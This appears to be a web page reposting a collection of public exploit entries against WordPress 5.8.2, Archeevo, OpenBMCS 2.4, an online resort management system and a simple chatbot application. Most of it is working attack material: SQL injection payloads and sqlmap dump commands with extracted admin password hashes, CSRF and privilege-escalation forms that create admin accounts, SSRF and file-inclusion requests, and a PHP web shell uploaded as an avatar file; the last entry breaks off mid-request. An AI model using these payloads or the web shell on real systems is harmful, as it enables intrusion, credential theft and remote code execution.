HireHackking

# Exploit Title: WordPress Core 5.8.2 - 'WP_Query' SQL Injection # Date: 11/01/2022 # Exploit Author: Aryan Chehreghani # Vendor Homepage: https://wordpress.org # Software Link: https://wordpress.org/download/releases # Version: < 5.8.3 # Tested on: Windows 10 # CVE : CVE-2022-21661 # [ VULNERABILITY DETAILS ] : #This vulnerability allows remote attackers to disclose sensitive information on affected installations of WordPress Core, #Authentication is not required to exploit this vulnerability, The specific flaw exists within the WP_Query class, #The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries, #An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. # [ References ] : https://wordpress.org/news/category/releases https://www.zerodayinitiative.com/advisories/ZDI-22-020 https://hackerone.com/reports/1378209 # [ Sample Request ] : POST /wp-admin/admin-ajax.php HTTP/1.1 Host: localhost Upgrade-Insecure_Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.99 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: cross-site Sec-Fetch-User: ?1 Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded action=<action_name>&nonce=a85a0c3bfa&query_vars={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["<inject>"]}}}

# Exploit Title: Archeevo 5.0 - Local File Inclusion # Google Dork: intitle:"archeevo" # Date: 01/15/2021 # Exploit Author: Miguel Santareno # Vendor Homepage: https://www.keep.pt/ # Software Link: https://www.keep.pt/produtos/archeevo-software-de-gestao-de-arquivos/ # Version: < 5.0 # Tested on: windows # 1. Description Unauthenticated user can exploit LFI vulnerability in file parameter. # 2. Proof of Concept (PoC) Access a page that don’t exist like /test.aspx and then you will be redirected to https://vulnerable_webiste.com/error?StatusCode=404&file=~/FileNotFoundPage.html After that change the file /FileNotFoundPage.html to /web.config and you be able to see the /web.config file of the application. https://vulnerable_webiste.com/error?StatusCode=404&file=~/web.config # 3. Research: https://miguelsantareno.github.io/MoD_1.pdf

# Exploit Title: OpenBMCS 2.4 - Cross Site Request Forgery (CSRF) # Exploit Author: LiquidWorm # Date: 26/10/2021 OpenBMCS 2.4 CSRF Send E-mail Vendor: OPEN BMCS Product web page: https://www.openbmcs.com Affected version: 2.4 Summary: Building Management & Controls System (BMCS). No matter what the size of your business, the OpenBMCS software has the ability to expand to hundreds of controllers. Our product can control and monitor anything from a garage door to a complete campus wide network, with everything you need on board. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64) Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686) Apache/2.4.41 (Ubuntu) Apache/2.4.25 (Debian) nginx/1.16.1 PHP/7.4.3 PHP/7.0.33-0+deb9u9 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5691 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5691.php 26.10.2021 -- <html> <body> <form action="https://192.168.1.222/core/sendFeedback.php" method="POST"> <input type="hidden" name="subject" value="FEEDBACK%20TESTINGUS" /> <input type="hidden" name="message" value="Take me to your leader." /> <input type="hidden" name="email" value="lab@zeroscience.mk" /> <input type="submit" value="Send" /> </form> </body> </html>

# Exploit Title: Online Resort Management System 1.0 - SQLi (Authenticated) # Date: 15/01/2022 # Exploit Author: Gaurav Grover # Vendor Homepage: <http://192.168.0.108/orms/admin/login.php> # Software Link: <https://www.sourcecodester.com/php/15126/online-resort-management-system-using-phpoop-free-source-code.html> # Version: 1.0 # Tested on: Linux and windows both Summary: There are a vulnerabilities in Online Resort Management System (ORMS) 1. The attacker can easily retrieved the database using sql injection. Proof of concepts : Database dump Manualy using SQL Injection, SQL Query & Users detaile are mentioned below: 1. After login with the admin credentials(Username : admin / Password : admin123) there is a vulnerable parameter name is id= 2. Found SQL Injection Parameter :- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2%27order%20by%2010--+ 3. http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,2,3,4,5,6,7,8,9,10--+ 4. (Database Name :- orms_db) Query:- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,database(),3,4,5,6,7,8,9,10--+ 5. (Table Name :- activity_list,message_list,reservation_list,room_list,system_info,users Query:- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),3,4,5,6,7,8,9,10--+ 6. (Username Password :- User-1 admin / 0192023a7bbd73250516f069df18b500 , User-2 cblake / 1cd74fae0a3adf459f73bbf187607ccea Query:- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,(select%20group_concat(username,password)%20from%20users),3,4,5,6,7,8,9,10--+ ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Database dump Automated using Sqlmap Tool, SQL Query & Users detaile are mentioned below: 1. Database Name:- sqlmap.py -u "http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2" --batch -dbs available databases [8]: [*] clinic_db [*] information_schema [*] mtms_db [*] mysql [*] orms_db [*] performance_schema [*] phpmyadmin [*] test 2- Dump the tables using this SQL Query:- sqlmap.py -u "http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2" --batch -D orms_db --tables Database: mtms [6 tables] +------------------+ | activity_list | | message_list | | reservation_list | | room_list | | system_info | | users | +------------------+ 3- Dump the database using this SQL Query:- sqlmap.py -u "http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2" --batch -D orms_db -T users --dump Database: orms_db Table: users [2 entries] +----+------+--------+-----------------------------------+----------+----------+---------------------------------------------+--------------+------------+------------+---------------------+---------------------+ | id | type | status | avatar | username | lastname | password | firstname | middlename | last_login | date_added | date_updated | +----+------+--------+-----------------------------------+----------+----------+---------------------------------------------+--------------+------------+------------+---------------------+---------------------+ | 1 | 1 | 1 | uploads/avatar-1.png?v=1639468007 | admin | Admin | 0192023a7bbd73250516f069df18b500 (admin123) | Adminstrator | NULL | NULL | 2021-01-20 14:02:37 | 2021-12-14 15:47:08 | | 5 | 2 | 1 | uploads/avatar-5.png?v=1641622906 | cblake1 | Blake | cd74fae0a3adf459f73bbf187607ccea (cblake) | Claire | NULL | NULL | 2022-01-08 14:21:46 | 2022-01-15 14:01:28 | +----+------+--------+-----------------------------------+----------+----------+---------------------------------------------+--------------+------------+------------+---------------------+---------------------+

# Exploit Title: OpenBMCS 2.4 - Create Admin / Remote Privilege Escalation # Exploit Author: LiquidWorm # Date: 26/10/2021 OpenBMCS 2.4 Create Admin / Remote Privilege Escalation Vendor: OPEN BMCS Product web page: https://www.openbmcs.com Affected version: 2.4 Summary: Building Management & Controls System (BMCS). No matter what the size of your business, the OpenBMCS software has the ability to expand to hundreds of controllers. Our product can control and monitor anything from a garage door to a complete campus wide network, with everything you need on board. Desc: The application suffers from an insecure permissions and privilege escalation vulnerability. A regular user can create administrative users and/or elevate her privileges by sending an HTTP POST request to specific PHP scripts in '/plugins/useradmin/' directory. Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64) Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686) Apache/2.4.41 (Ubuntu) Apache/2.4.25 (Debian) nginx/1.16.1 PHP/7.4.3 PHP/7.0.33-0+deb9u9 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5693 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5693.php 26.10.2021 -- List current ID and permissions (read): --------------------------------------- POST /plugins/useradmin/getUserDetails.php HTTP/1.1 Host: 192.168.1.222 Cookie: PHPSESSID=ecr4lvcqvkdae4eimf3ktqeqn4 Content-Length: 16 Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99" Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://192.168.1.222 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://192.168.1.222/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close id_list%5B%5D=17 HTTP/1.1 200 OK Date: Tue, 16 Nov 2021 20:56:53 GMT Server: Apache/2.4.41 (Ubuntu) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Length: 692 Connection: close Content-Type: text/html; charset=UTF-8 [{"user_id":"17","username":"testingus","email":"","expiry_date":null,"fullname":"test","phone":"","module_id":"useradmin","usermodule_permission":"1","permissions":[{"user_id":"17","module_id":"alarms","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"controllers","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"core","permissions":"0","mod_home":"0"},{"user_id":"17","module_id":"graphics","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"history","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"progtool","permissions":"1","mod_home":"0"},{"user_id":"17","module_id":"useradmin","permissions":"1","mod_home":"0"}],"human-date":""}] List current ID and permissions (admin): ---------------------------------------- POST /plugins/useradmin/getUserDetails.php HTTP/1.1 Host: 192.168.1.222 Cookie: PHPSESSID=ecr4lvcqvkdae4eimf3ktqeqn4 Content-Length: 16 Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99" Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://192.168.1.222 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://192.168.1.222/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close id_list%5B%5D=18 HTTP/1.1 200 OK Date: Tue, 16 Nov 2021 20:56:36 GMT Server: Apache/2.4.41 (Ubuntu) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Length: 725 Connection: close Content-Type: text/html; charset=UTF-8 [{"user_id":"18","username":"testingus2","email":"testingus@test.tld","expiry_date":null,"fullname":"TestName","phone":"1112223333","module_id":"useradmin","usermodule_permission":"4","permissions":[{"user_id":"18","module_id":"alarms","permissions":"3","mod_home":"1"},{"user_id":"18","module_id":"controllers","permissions":"2","mod_home":"1"},{"user_id":"18","module_id":"core","permissions":"1","mod_home":"0"},{"user_id":"18","module_id":"graphics","permissions":"4","mod_home":"1"},{"user_id":"18","module_id":"history","permissions":"3","mod_home":"1"},{"user_id":"18","module_id":"progtool","permissions":"3","mod_home":"0"},{"user_id":"18","module_id":"useradmin","permissions":"4","mod_home":"0"}],"human-date":""}] Escalate privileges: -------------------- POST /plugins/useradmin/update_user_permissions.php HTTP/1.1 Host: 192.168.1.222 Cookie: PHPSESSID=ecr4lvcqvkdae4eimf3ktqeqn4 Content-Length: 702 Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99" Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://192.168.1.222 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://192.168.1.222/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close permissions%5B0%5D%5Bpermissions%5D=3&permissions%5B0%5D%5BmoduleID%5D=alarms&permissions%5B0%5D%5Bmod_home%5D=1&permissions%5B1%5D%5Bpermissions%5D=2&permissions%5B1%5D%5BmoduleID%5D=controllers&permissions%5B1%5D%5Bmod_home%5D=1&permissions%5B2%5D%5Bpermissions%5D=1&permissions%5B2%5D%5BmoduleID%5D=core&permissions%5B3%5D%5Bpermissions%5D=4&permissions%5B3%5D%5BmoduleID%5D=graphics&permissions%5B3%5D%5Bmod_home%5D=1&permissions%5B4%5D%5Bpermissions%5D=3&permissions%5B4%5D%5BmoduleID%5D=history&permissions%5B4%5D%5Bmod_home%5D=1&permissions%5B5%5D%5Bpermissions%5D=3&permissions%5B5%5D%5BmoduleID%5D=progtool&permissions%5B6%5D%5Bpermissions%5D=4&permissions%5B6%5D%5BmoduleID%5D=useradmin&id=17 HTTP/1.1 200 OK Date: Tue, 16 Nov 2021 20:58:48 GMT Server: Apache/2.4.41 (Ubuntu) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 1 Connection: close Content-Type: text/html; charset=UTF-8 2 Create admin from read user: ---------------------------- POST /plugins/useradmin/create_user.php HTTP/1.1 Host: 192.168.1.222 Cookie: PHPSESSID=ecr4lvcqvkdae4eimf3ktqeqn4 Content-Length: 1010 Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99" Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://192.168.1.222 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://192.168.1.222/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close user%5Busername%5D=testingus2&user%5Bfullname%5D=TestName&user%5Bphone%5D=1112223333&user%5Bpassword%5D=Password123&user%5BpasswordConfirm%5D=Password123&user%5Bemail%5D=testingus%40test.tld&user%5Bexpiry%5D=&permissions%5B0%5D%5BmoduleID%5D=alarms&permissions%5B0%5D%5Bpermissions%5D=3&permissions%5B0%5D%5Bmod_home%5D=1&permissions%5B1%5D%5BmoduleID%5D=controllers&permissions%5B1%5D%5Bpermissions%5D=2&permissions%5B1%5D%5Bmod_home%5D=1&permissions%5B2%5D%5BmoduleID%5D=core&permissions%5B2%5D%5Bpermissions%5D=1&permissions%5B2%5D%5Bmod_home%5D=0&permissions%5B3%5D%5BmoduleID%5D=graphics&permissions%5B3%5D%5Bpermissions%5D=4&permissions%5B3%5D%5Bmod_home%5D=1&permissions%5B4%5D%5BmoduleID%5D=history&permissions%5B4%5D%5Bpermissions%5D=3&permissions%5B4%5D%5Bmod_home%5D=1&permissions%5B5%5D%5BmoduleID%5D=progtool&permissions%5B5%5D%5Bpermissions%5D=3&permissions%5B5%5D%5Bmod_home%5D=0&permissions%5B6%5D%5BmoduleID%5D=useradmin&permissions%5B6%5D%5Bpermissions%5D=4&permissions%5B6%5D%5Bmod_home%5D=0 HTTP/1.1 200 OK Date: Tue, 16 Nov 2021 20:18:58 GMT Server: Apache/2.4.41 (Ubuntu) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8 {"status":"success"} PoC escalate from editor to admin: ---------------------------------- <html> <body> <form action="https://192.168.1.222/plugins/useradmin/update_user_permissions.php" method="POST"> <input type="hidden" name="permissions[0][permissions]" value="3" /> <input type="hidden" name="permissions[0][moduleID]" value="alarms" /> <input type="hidden" name="permissions[0][mod_home]" value="1" /> <input type="hidden" name="permissions[1][permissions]" value="2" /> <input type="hidden" name="permissions[1][moduleID]" value="controllers" /> <input type="hidden" name="permissions[1][mod_home]" value="1" /> <input type="hidden" name="permissions[2][permissions]" value="1" /> <input type="hidden" name="permissions[2][moduleID]" value="core" /> <input type="hidden" name="permissions[3][permissions]" value="4" /> <input type="hidden" name="permissions[3][moduleID]" value="graphics" /> <input type="hidden" name="permissions[3][mod_home]" value="1" /> <input type="hidden" name="permissions[4][permissions]" value="3" /> <input type="hidden" name="permissions[4][moduleID]" value="history" /> <input type="hidden" name="permissions[4][mod_home]" value="1" /> <input type="hidden" name="permissions[5][permissions]" value="3" /> <input type="hidden" name="permissions[5][moduleID]" value="progtool" /> <input type="hidden" name="permissions[6][permissions]" value="4" /> <input type="hidden" name="permissions[6][moduleID]" value="useradmin" /> <input type="hidden" name="id" value="17" /> <input type="submit" value="Esc" /> </form> </body> </html> PoC create admin from editor: ----------------------------- <html> <body> <form action="https://192.168.1.222/plugins/useradmin/create_user.php" method="POST"> <input type="hidden" name="user[username]" value="testingus2" /> <input type="hidden" name="user[fullname]" value="TestName" /> <input type="hidden" name="user[phone]" value="1112223333" /> <input type="hidden" name="user[password]" value="Password123" /> <input type="hidden" name="user[passwordConfirm]" value="Password123" /> <input type="hidden" name="user[email]" value="testingus@test.tld" /> <input type="hidden" name="user[expiry]" value="" /> <input type="hidden" name="permissions[0][moduleID]" value="alarms" /> <input type="hidden" name="permissions[0][permissions]" value="3" /> <input type="hidden" name="permissions[0][mod_home]" value="1" /> <input type="hidden" name="permissions[1][moduleID]" value="controllers" /> <input type="hidden" name="permissions[1][permissions]" value="2" /> <input type="hidden" name="permissions[1][mod_home]" value="1" /> <input type="hidden" name="permissions[2][moduleID]" value="core" /> <input type="hidden" name="permissions[2][permissions]" value="1" /> <input type="hidden" name="permissions[2][mod_home]" value="0" /> <input type="hidden" name="permissions[3][moduleID]" value="graphics" /> <input type="hidden" name="permissions[3][permissions]" value="4" /> <input type="hidden" name="permissions[3][mod_home]" value="1" /> <input type="hidden" name="permissions[4][moduleID]" value="history" /> <input type="hidden" name="permissions[4][permissions]" value="3" /> <input type="hidden" name="permissions[4][mod_home]" value="1" /> <input type="hidden" name="permissions[5][moduleID]" value="progtool" /> <input type="hidden" name="permissions[5][permissions]" value="3" /> <input type="hidden" name="permissions[5][mod_home]" value="0" /> <input type="hidden" name="permissions[6][moduleID]" value="useradmin" /> <input type="hidden" name="permissions[6][permissions]" value="4" /> <input type="hidden" name="permissions[6][mod_home]" value="0" /> <input type="submit" value="Cre" /> </form> </body> </html>

# Exploit Title: OpenBMCS 2.4 - SQLi (Authenticated) # Exploit Author: LiquidWorm # Date: 26/10/2021 OpenBMCS 2.4 Authenticated SQL Injection Vendor: OPEN BMCS Product web page: https://www.openbmcs.com Affected version: 2.4 Summary: Building Management & Controls System (BMCS). No matter what the size of your business, the OpenBMCS software has the ability to expand to hundreds of controllers. Our product can control and monitor anything from a garage door to a complete campus wide network, with everything you need on board. Desc: OpenBMCS suffers from an SQL Injection vulnerability. Input passed via the 'id' GET parameter is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64) Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686) Apache/2.4.41 (Ubuntu) Apache/2.4.25 (Debian) nginx/1.16.1 PHP/7.4.3 PHP/7.0.33-0+deb9u9 Vulnerability discovered by Semen 'samincube' Rozhkov @zeroscience Advisory ID: ZSL-2022-5692 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5692.php 26.10.2021 -- The following PoC request demonstrates the issue (authenticated user session is required): GET /debug/obix_test.php?id=1%22 HTTP/1.1 Host: 192.168.1.222 Cookie: PHPSESSID=ssid123ssid123ssid1234ssid Connection: close Response: HTTP/1.1 200 OK Date: Sat, 1 Jan 2022 15:09:54 GMT Server: Apache/2.4.10 (Debian) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 629 Connection: close Content-Type: text/html; charset=UTF-8 <br /> <b>Fatal error</b>: Uncaught exception 'PDOException' with message 'SQLSTATE[HY000]: General error: 1 unrecognized token: """' in /var/www/openBMCS/classes/dbconnection.php:146 Stack trace: #0 /var/www/openBMCS/classes/dbconnection.php(146): PDO->query('SELECT ip_addre...') #1 /var/www/openBMCS/php/obix/obix.functions.php(289): controllerDB->querySingle('SELECT ip_addre...', true) #2 /var/www/openBMCS/debug/obix_test.php(16): sendObixGetTocontroller(Object(controllerDB), '1"', '/obix/config') #3 {main} thrown in <b>/var/www/openBMCS/classes/dbconnection.php</b> on line <b>146</b><br />

# Exploit Title: OpenBMCS 2.4 - Server Side Request Forgery (SSRF) (Unauthenticated) # Exploit Author: LiquidWorm # Date: 26/10/2021 OpenBMCS 2.4 Unauthenticated SSRF / RFI Vendor: OPEN BMCS Product web page: https://www.openbmcs.com Affected version: 2.4 Summary: Building Management & Controls System (BMCS). No matter what the size of your business, the OpenBMCS software has the ability to expand to hundreds of controllers. Our product can control and monitor anything from a garage door to a complete campus wide network, with everything you need on board. Desc: Unauthenticated Server-Side Request Forgery (SSRF) and Remote File Include (RFI) vulnerability exists in OpenBMCS within its functionalities. The application parses user supplied data in the POST parameter 'ip' to query a server IP on port 81 by default. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host. This can be used by an external attacker for example to bypass firewalls and initiate a service and network enumeration on the internal network through the affected application, allows hijacking the current session of the user, execute cross-site scripting code or changing the look of the page and content modification on current display. Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64) Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686) Apache/2.4.41 (Ubuntu) Apache/2.4.25 (Debian) nginx/1.16.1 PHP/7.4.3 PHP/7.0.33-0+deb9u9 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5694 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5694.php 26.10.2021 -- POST /php/query.php HTTP/1.1 Host: 192.168.1.222 Content-Length: 29 Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96" Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://192.168.1.222 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://192.168.1.222/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close ip=www.columbia.edu:80&argu=/ HTTP/1.1 302 Found Date: Tue, 14 Dec 2021 20:26:47 GMT Server: Apache/2.4.41 (Ubuntu) Set-Cookie: PHPSESSID=gktecb9mjv4gp1moo7bg3oovs3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: ../login.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 32141 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <!-- developed by CUIT --> <!-- 08/28/18, 8:55:54am --><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge" > <meta name="msvalidate.01" content="DB472D6D4C7DB1E74C6D939F9C8AA8B4" /> <title>Columbia University in the City of New York</title> ... ...

# Exploit Title: OpenBMCS 2.4 - Information Disclosure # Exploit Author: LiquidWorm # Date: 26/10/2021 OpenBMCS 2.4 Secrets Disclosure Vendor: OPEN BMCS Product web page: https://www.openbmcs.com Affected version: 2.4 Summary: Building Management & Controls System (BMCS). No matter what the size of your business, the OpenBMCS software has the ability to expand to hundreds of controllers. Our product can control and monitor anything from a garage door to a complete campus wide network, with everything you need on board. Desc: The application allows directory listing and information disclosure of some sensitive files that can allow an attacker to leverage the disclosed information and gain full BMS access. Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64) Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686) Apache/2.4.41 (Ubuntu) Apache/2.4.25 (Debian) nginx/1.16.1 PHP/7.4.3 PHP/7.0.33-0+deb9u9 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5695 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5695.php 26.10.2021 -- https://192.168.1.222/debug/ Index of /debug change_password_sqls clear_all_watches.php controllerlog/ dash/ dodgy.php fix_out.php graphics/ graphics_diag.php graphics_ip_diag/ jace_info.php kits/ mysession.php nuke.php obix_test.php print_tree.php reboot_backdoor.php rerunSQLUpdates.php reset_alarm_trigger_times.php system/ test_chris_obix.php timestamp.php tryEmail.php trysms.php unit_testing/ userlog/ ... ... /cache/ /classes/ /config/ /controllers/ /core/ /css/ /display/ /fonts/ /images/ /js/ /php/ /plugins/ /sounds/ /temp/ /tools/ /core/assets/ /core/backup/ /core/crontab/ /core/font/ /core/fonts/ /core/license/ /core/load/ /core/logout/ /core/password/ /php/audit/ /php/phpinfo.php /php/temp/ /php/templates/ /php/test/ /php/weather/ /plugins/alarms/ /tools/phpmyadmin/index.php /tools/migrate.php

# Exploit Title: Simple Chatbot Application 1.0 - 'message' Blind SQLi # Date: 18/01/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14788/simple-chatbot-application-using-php-source-code.html # Version: 1.0 # Tested on: XAMPP, Windows 10 # Steps # Go to : http://127.0.0.1/classes/Master.php?f=get_response # Save request in BurpSuite # Run saved request with sqlmap -r sql.txt ====== POST /classes/Master.php?f=get_response HTTP/1.1 Host: 127.0.0.1 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Cookie: PHPSESSID=45l30lmah262k7mmg2u5tktbc2 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Content-Length: 73 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 Connection: Keep-alive message=' AND (SELECT 8288 FROM (SELECT(SLEEP(10)))ypPC) AND 'Saud'='Saud ====== #Payloads #Payload (UNION query) message=-8150' UNION ALL SELECT CONCAT(0x717a766b71,0x6d466451694363565172525259434d436c53677974774a424b635856784f4d5a41594e4e75424474,0x716a7a7171),NULL-- - #(AND/OR time-based blind) message=' AND (SELECT 8288 FROM (SELECT(SLEEP(10)))ypPC) AND 'Saud'='Saud

# Exploit Title: Simple Chatbot Application 1.0 - Remote Code Execution (RCE) # Date: 18/01/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14788/simple-chatbot-application-using-php-source-code.html # Version: 1.0 # Tested on: XAMPP, Windows 10 # Exploit : You can upload a php shell file as a bot_avatar or user_avatar or image # ------------------------------------------------------------------------------------------ # POC # ------------------------------------------------------------------------------------------ # Request sent as base user POST /classes/SystemSettings.php?f=update_settings HTTP/1.1 Host: localhost.SA Cookie: PHPSESSID=vgs6dm14ubfcmbi4kvgod1jeb4; _ga=GA1.2.1002000635.1642463002; _gid=GA1.2.990020096.1642463002 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------55217074722533208072616276474 Content-Length: 1121 Connection: close -----------------------------55217074722533208072616276474 Content-Disposition: form-data; name="name" -----------------------------55217074722533208072616276474 Content-Disposition: form-data; name="short_name" -----------------------------55217074722533208072616276474 Content-Disposition: form-data; name="intro" -----------------------------55217074722533208072616276474 Content-Disposition: form-data; name="no_result" -----------------------------55217074722533208072616276474 Content-Disposition: form-data; name="img"; filename="" Content-Type: image/jpeg -----------------------------55217074722533208072616276474 Content-Disposition: form-data; name="bot_avatar"; filename="bot_avatar.php" Content-Type: application/octet-stream <?php if($_REQUEST['s']) { system($_REQUEST['s']); } else phpinfo(); ?> </pre> </body> </html> -----------------------------55217074722533208072616276474 Content-Disposition: form-data; name="user_avatar"; filename="" Content-Type: application/octet-stream -----------------------------55217074722533208072616276474-- # Response HTTP/1.1 200 OK Date: Tue, 18 Jan 2022 00:51:29 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12 X-Powered-By: PHP/8.0.12 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 119 Connection: close Content-Type: text/html; charset=UTF-8 1 # ------------------------------------------------------------------------------------------ # Request to webshell # ------------------------------------------------------------------------------------------ GET /uploads/bot_avatar.php?s=echo+0xSaudi HTTP/1.1 Host: localhost.SA Cookie: 